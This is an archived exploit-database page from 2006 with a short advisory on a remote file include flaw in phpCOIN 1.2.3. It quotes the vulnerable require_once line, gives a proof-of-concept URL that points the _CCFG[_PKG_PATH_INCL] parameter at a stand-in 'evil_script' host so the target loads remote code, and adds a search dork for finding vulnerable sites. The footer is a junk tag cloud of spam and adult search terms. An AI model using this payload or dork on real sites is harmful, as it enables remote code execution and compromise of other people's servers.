about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability



2006-08-24 phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability
Rated as : High Risk

phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org
##################################################################

Vulnerable: require_once include
($_CCFG['_PKG_PATH_INCL'].'redirect.php');

###################################################################

Exploit PoC:

http://www.site.com/[path]/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?

Dork: Powered By phpCOIN 1.2.3
####################################################################

Shoutz:
Warpboy,Z66,Gammarays,Archangel,BliTz,Splinter,InTel,ErazerZ,Maggot,PunKerX,Infiltration

#####################################################################
securitydot.net - 2006-08-24

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 13:11:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
indin sex Tagger LE Sexklips SEXY HOT G TOONSEX poly game www.tjbaoj imagine Sexilaski palyboy pi angilinaju Morai school gir arabsex Invision P SEXXxxxx bobax exploit Sex move.c www.teaen. maxcpm.inf news for c phpAdsNew www.thamil port 7.htm 200 /compo angilinaju SEXYPICTS. group crea sarahazari proxies VIDOESEX maxportal animal sex news for c Php yabanci d sexcypictu www.cy121. oracel Sexwithme t127t gwar Site Contr GET /galle chaves e s 49205/76 www.come12 Putas.lati 8970